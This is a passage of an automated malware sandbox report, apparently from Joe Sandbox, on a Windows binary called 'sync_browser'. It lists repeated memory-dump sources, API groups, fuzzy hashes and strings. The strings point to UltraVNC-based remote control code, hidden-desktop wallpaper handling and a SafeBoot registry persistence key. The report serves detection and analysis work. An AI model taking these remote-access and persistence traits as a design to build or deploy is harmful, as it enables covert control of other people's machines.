                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                    • String ID:
                                                    • API String ID: 2426525106-0
                                                    • Opcode ID: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
                                                    • Instruction ID: 294934a17120583a0dd30931f2ff85bc9623ef1b45894e80a92128c2f8d07346
                                                    • Opcode Fuzzy Hash: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
                                                    • Instruction Fuzzy Hash: 4101FF22A19A4197DA54EB66EA5047CA324FFC8F84BC44032DE5D47B65CF38E866C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                    • String ID:
                                                    • API String ID: 2426525106-0
                                                    • Opcode ID: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
                                                    • Instruction ID: 22745c34d6add9f62d11bb30a3d00d17f712a2d81145ea9669a1f39739dec771
                                                    • Opcode Fuzzy Hash: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
                                                    • Instruction Fuzzy Hash: 1901FF22A19A4197DA54EB66EA5047CA724FFC8F84BC44033DE5D47761CF38E8A6C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                    • String ID:
                                                    • API String ID: 2426525106-0
                                                    • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                    • Instruction ID: 0ae69d9bfe968b89778a0310ef836fe2e2454d6d9e17a7e43944d6ca54e9c66a
                                                    • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                    • Instruction Fuzzy Hash: E2F0B262A69A5187EB54EF75E85147CA728FFC8F88BC44032CE1E57265CF38D896C320
                                                    APIs
                                                    Strings
                                                    • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF7D595BA26
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$EnterFileRead
                                                    • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                    • API String ID: 3826087893-1161645139
                                                    • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                    • Instruction ID: d0c137b45ea4379a74581659b4177d17925cfe9ced1aab31dcf20509f67b5861
                                                    • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                    • Instruction Fuzzy Hash: 41B1BF72A08A428AE7549F25C8403BD77A2EB94F9CFC84136DE5E4B6C9CF78E411C764
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: EnumDisplayDevicesA$USER32
                                                    • API String ID: 145871493-2970514552
                                                    • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                    • Instruction ID: 829f8a046da73eef68998167f7618d02ec244b7cd4db2cdb27cb0beb32924b56
                                                    • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                    • Instruction Fuzzy Hash: 5D31B532609B8287EA64EB15F4546ADA6A0FF89B98FD40136EE9D03794DF3DD805C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: EnumDisplayDevicesA$USER32
                                                    • API String ID: 145871493-2970514552
                                                    • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                    • Instruction ID: 133fb5bdcc7fe4e67a848933df7d224604b38fa660748001d707ea42426c1ef9
                                                    • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                    • Instruction Fuzzy Hash: 02317232608B8686E665EB15B4546ADABA0FF89F98FD40236EE9D03794DF3DD4018720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: EnumDisplayDevicesA$USER32
                                                    • API String ID: 145871493-2970514552
                                                    • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                    • Instruction ID: c77bcbe3e772a33e8faedcce093eaa3e05769f9d3cdda54ce41cc18fc6c84c88
                                                    • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                    • Instruction Fuzzy Hash: 20218472B18B8247E764EF15E440A6DA7A4FB89B94FC50136ED5D43784DF3DD4018750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                    • API String ID: 3677997916-1834015684
                                                    • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                    • Instruction ID: 356b1e9daaf70f2a84b1f8a1e2595491814a30e751a5fb52ba44fb33968c2a2c
                                                    • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                    • Instruction Fuzzy Hash: 7B213561A18A8282FB609B24E4447AEF7A4FF98B58FC41136DE4D07698EF3CD055CB14
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                    • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                    • API String ID: 3848869850-2975526927
                                                    • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                    • Instruction ID: 0715862af1dc6435ca645c3c77f199136e36d45ce8ce7623e2f95c65a0acd122
                                                    • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                    • Instruction Fuzzy Hash: AC11F864E1915383FB18BB64E814ABDAF51AF90B48FC04437CC0E576A1DF3CA605C7A1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Installed$System\WPA\MediaCenter
                                                    • API String ID: 3677997916-3461404619
                                                    • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                    • Instruction ID: d7189e7d0db5bec80c18eb67dafb6e72605bb9c7c38c46ef2399dce1ab0c5936
                                                    • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                    • Instruction Fuzzy Hash: 39013071628B9187EB509B25F444B5AB7A4FB84B88FC00132EA9D46A58DF3CD154CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                    • String ID: Permissions$isWritable
                                                    • API String ID: 4007284473-46173998
                                                    • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                    • Instruction ID: 56d47585085f54f49572802057b599b8885a67ba7a9871cc7cdaf7798d3a28aa
                                                    • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                    • Instruction Fuzzy Hash: 15017161A0965793FA14AB25F4519A9B720FFD9F98FC42033DD0E0B254EF2CE149C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                    • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                    • API String ID: 1597899911-1199838351
                                                    • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                    • Instruction ID: ff018f53b2cac96dd97796f96d13ad8c399ba82bb52951ad6f429678fd7ef136
                                                    • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                    • Instruction Fuzzy Hash: 57F09661629A4282EA14A720F4517AEA750FF84748FC01137EA4D43798CF3CD105C764
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1050512615-0
                                                    • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                    • Instruction ID: 44c3be7619f27613c89d2768f7e53e1554c08f0207b452a1ac8836d1b222afbc
                                                    • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                    • Instruction Fuzzy Hash: C971B012E0C2D257FB616B7195501BCABA4AB01F8CFD89473FE990669ACF3CE851C321
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                    • String ID:
                                                    • API String ID: 307345228-0
                                                    • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                    • Instruction ID: 1f4e0202271c4cbc88bb45f763dde2f7bee5b054a97c4f05e827ee556a3c889c
                                                    • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                    • Instruction Fuzzy Hash: 8E418432A196419BEB24AF2598005ADA7D5FF44FB8FD84232EE2D477D5DF38D4018310
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7AB1
                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7AC1
                                                      • Part of subcall function 00007FF7D59F3480: _errno.LIBCMT ref: 00007FF7D59F3489
